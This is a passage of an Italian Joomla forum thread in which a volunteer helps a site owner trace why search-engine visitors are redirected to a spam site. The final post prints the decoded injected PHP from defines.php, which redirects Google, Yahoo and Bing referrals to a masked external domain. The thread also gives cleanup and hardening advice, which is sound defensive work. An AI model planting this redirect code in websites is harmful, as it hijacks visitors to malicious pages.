Autore Topic: [RISOLTO] problema di virus sul sito (Letto 51269 volte)

pumacocina · « **Risposta #20 il:** 28 Gen 2010, 18:14:09 »

Ciao,
1) il file htaccess non è più presente (ho conservato l'originale htaccessOld) in quanto l'avevo rinominato in .htaccess per utilizzare il mod_rewrite, ma nella cartella principale non lo vedo!

2)la cartella è cgi-bin ed è vuota

la scansione l'ho fatta e ho trovato il crak di un programma peraltro noto e di largo uso

mau_develop · « **Risposta #21 il:** 28 Gen 2010, 19:07:49 »

se non usi quella cartella riduci i permessi a 644 (se puoi)... io dal mio l'ho proprio tolta, ma se non sei consapevole se ti potrà servire lasciala pure.

per il virus ho visto che tentava di andare a cercare un po' di dll e di exe, quindi tutta roba win, e può darsi pure che cercava qualcosa del browser per modificare delle preferenze.

FFox non dovrebbe risentirne e nemmeno linux, per il resto io di win ci capisco veramente poco...quindi fidati dei tuoi antivirus.

mi interessava la risposta del provider, perchè se lui dice che la mia "teoria" è sbagliata e i problemi permangono allora vedo di aiutarti in un altro modo, chessò magari togli i dati sensibili e mi spedisci tutto in uno zip che ci guardo io.

Non avendo accesso a quel server e non volendo comunque immischiarmi nei cavoli di quel provider ho potuto solo vedere cosa accadeva e a che cosa assomigliava, ma ripeto... non sono infallibile

.... però sono testardo e finche non raggiungo l'obbiettivo non smetto

M.

pumacocina · « **Risposta #22 il:** 28 Gen 2010, 19:36:19 »

1) non ne sono consapevole

2) ho provato anche da un altro computer (sempre win) ed è la stessa cosa (anche con altri motori di ricerca cliccando sul collegamento sulkitinera.com si apre http://p3p0.com/?said=3333g&q=escursioni+in+sardegna: ). L'antivirus che uso è uno a pagamento che fino ad ora l'ho considero il più efficace

3) il provider non mi ha ancora risposto e gli ho inviato anche un cortese sollecito

4) da uno che dedica il proprio tempo come fai tu, non posso che fidarmi ad occhi chiusi. Non a caso sei in un forum che mi sa, non ha eguali per personaggi di alta caratura tecnica e di serietà

pumacocina · « **Risposta #23 il:** 29 Gen 2010, 18:29:37 »

Il provider non mi ha risposto neanche oggi!

Intanto nella cartella cgi-bin ho provato a mettere i permessi 644 e non è cambiato niente, se non che, volendo ritornare indietro non c'è più la cartella!

Per quanto riguarda il file htaccess che avevo rinominato .htaccess potrei rinominare il file originale e abilitare "RewriteEngine"?
Oppure così facendo incasinerei tutto?

mau_develop · « **Risposta #24 il:** 29 Gen 2010, 18:38:33 »

bisogna prima capire dove sta il problema...

..ascolta, che contenuti tuoi hai tra i files oltre i soliti di joomla?

immagini, documenti etc che hai uploadato tu

M.

pumacocina · « **Risposta #25 il:** 29 Gen 2010, 19:03:49 »

ci sono foto con ozio, le traduzioni con fish, 1 sondaggio, login, chronoform e contatti.
ma non ci potresti dare un'occhiata tu?
potrei chiamarti al tel (solo con tua autorizzazione) così ci sentiamo

mau_develop · « **Risposta #26 il:** 29 Gen 2010, 19:08:56 »

se ci sono img private toglile, togli pure il configuration.php, zippa e spediscimelo alla mia mail (profilo), stasera gli dò una passata

... magari anche il db senza la tabella users

M.

pumacocina · « **Risposta #27 il:** 29 Gen 2010, 19:53:05 »

ok, grazie mille mau_develop

mau_develop · « **Risposta #28 il:** 29 Gen 2010, 22:42:47 »

finito...
direi che sta tutto benissimo

spulciati un po' i contenuti del db, se c'è qualcosa dovresti vedere una serie di caratteri "strani", ma lunghe, tanti caratteri

TOGLI tutto ciò che non usi, tienilo solo in locale se proprio hai paura di perderlo.

I template che non usi disinstallali e cancella le cartelle.

avere files tipo install non serve e nemmeno tutti i txt che stanno a fianco, se proprio vuoi tieni la licenza.

ANCHE EVENTUALI addons che non usi tranne quelle del core toglile, sono comunque soggette ad attacco.

Assicurati di aver abilitato solo ciò che è in uso, magari hai moduli tipo ultime notizie abilitato e manco lo usi,.. succede.

TUTTI gli addons e SOPRATTUTTO le gallerie sono soggette ad attacchi, le immagini e magari gli upload sono ottimi vettori e vengono scoperte vuln a raffica proprio perchè sono le più attaccate.
MANTIENILE sempre all'ultima versione disponibile.

FAI una registrazione agli avvisi di vulnerabilità che ti allertano, molti spacciatori di addons ne hanno uno.

Hai anche altri addons, sono aggiornati?

... ti ho risposto quì perchè magari serve a qualcuno.

ah! dimenticavo.... CAMBIA HOSTING

M.

EDIT: Questo spero tu l'abbia letto:

http://forum.joomla.it/index.php/topic,91159.0.html

pumacocina · « **Risposta #29 il:** 30 Gen 2010, 00:33:55 »

grazie 1000 mau_develop per la tua grande disponibilità.
Adesso vedrò di eliminare tutto ciò che non uso come hai detto e speriamo bene.
Certo che tra le infinità di cose che non so e non capisco di mio, non so proprio come fare per "dire" ai motori di ricerca che il sito non è portare di virus;
infatti digitando regolarmente l'url nella barra degli indirizzi entro senza alcun avviso.

Ti ringrazio
pumacocina

pumacocina · « **Risposta #30 il:** 30 Gen 2010, 01:11:18 »

purtroppo non avevo letto di questo file della ozio: writeToFile.php, ora ho eliminato anch'esso.

components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php

grazie

pumacocina · « **Risposta #31 il:** 30 Gen 2010, 02:00:15 »

Novità importante, ma ancora dai motori sempre la stessa risposta clicando sul collegamento al sito:
"We did not find any results containing escursioni in sardegna" oppure "We did not find any results containing 0h."

La novità è che controllando tutti i link presenti nel sito, in quello di un albergo il mio antivirus ha rilevato: Trajan.JS.Agent.aoh

pumacocina · « **Risposta #32 il:** 30 Gen 2010, 08:46:07 »

Il provaider risponde:
"Il fatto che il sito sia visto dai motori di ricerca come ´´malevolo´´ non dipende da noi ma dal codice che compone il sito stesso. Deve quindi ricercare nel codice html del sito le porzioni di codice che creano questo problema."

mau_develop · « **Risposta #33 il:** 30 Gen 2010, 09:45:06 »

La novità è che controllando tutti i link presenti nel sito, in quello di un albergo il mio antivirus ha rilevato: Trajan.JS.Agent.aoh
----------------------------------------------------------------
mi fai capire qual'è questo link?

se hai usaro un modulo banner/link/similare guarda i contenuti del db.

I files del sito li ho passati uno ad uno, ho controllato anche le date di ultima modifica... più di così.

Oggi appena ho tempo faccio una prova direttamente sull'hosting, non ti allarmare se vedi qualcosa di strano.

.... resto convinto che il problema è dell'hosting.

"Il fatto che il sito sia visto dai motori di ricerca come ´´malevolo´´
-------------------------------------------------------------
non hanno capito 'na sega...come al solito

pumacocina · « **Risposta #34 il:** 30 Gen 2010, 09:57:24 »

La pagina "Dove alloggiare" sono presenti alcuni link utilizzando il componente "web Link".
Facendo un controllo dei link presenti, in uno (che ho rimosso) il mio antivirus ha rilevato: Trajan.JS.Agent.aoh.

Stamane seguendo a spulciare nel forum, ho controllato il file defines.php (alla ricerca di "eval()") per riscriverli con i file originali, ma non avendolo trovato (eval), non gli ho sovrascritti.

mau_develop · « **Risposta #35 il:** 30 Gen 2010, 10:06:25 »

c'è un'altra prova molto grezza che si potrebbe fare ma non vorrei farti fare casini da cui poi non riesci a tornare indietro.

... ma se te spazzoli via gli index nella directory principale, il framework di joomla non dovrebbe nemmeno avviarsi e tu non puoi raggiungere quelle pagine php.... chiamate da nulla non si eseguono e non si esegue nessun codice all'interno.

Se cliccando il link di google succede ancora allora il probl è per forza del provider, altrimenti non sto valutando qualcosa.

M.

pumacocina · « **Risposta #36 il:** 30 Gen 2010, 10:15:40 »

eliminati i due file:
index.php
index2.php

il risultato è: Error 403! con firefox
Error 404 File Not Found! con win

mau_develop · « **Risposta #37 il:** 30 Gen 2010, 10:25:23 »

... continuiamo in pvt.

ps al cell non sei raggiungibile

M.

pumacocina · « **Risposta #38 il:** 30 Gen 2010, 10:30:04 »

raggiungibile

mau_develop · « **Risposta #39 il:** 30 Gen 2010, 11:39:37 »

Codice trovato, è lo stesso noto problema dell'iniezione del file defines.php nella cartella includes.

viene iniettato un codice in base64 che redirige:
if (stristr($_SERVER[HTTP_REFERER],"google")) { if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){ preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk); if (stristr($kk[1],"&")) { preg_match ("/(.*?)\&/",$kk[1],$key2); $keyword=urldecode($key2[1]); }else { $keyword=urldecode($kk[1]); } header("Location: http://xxxxxxxxxx.xxx.pl/?q=".$keyword); exit(); } }elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) { preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: http://xxxxxxxxxxx.xxx.pl/?q=".$kk[1]); exit(); }elseif (stristr($_SERVER[HTTP_REFERER],"bing")) { preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); header("Location: http://xxxxxxxx.xxx.pl/?q=".$kk[1]); exit(); }

QUINDI:
- il provider non c'entra (ma fa c...are ugualmente la conf di quel LOCALHOST)

per la risoluzione non fatevi tanti problemi, sostituite il files con quello di un altro pacchetto joomla stessa vers.

M.

PS. ... mea culpa, sono andato a cercare la cosa più difficile quando la soluzione era molto più banale.
... dò le dimissioni vado a fare il droghiere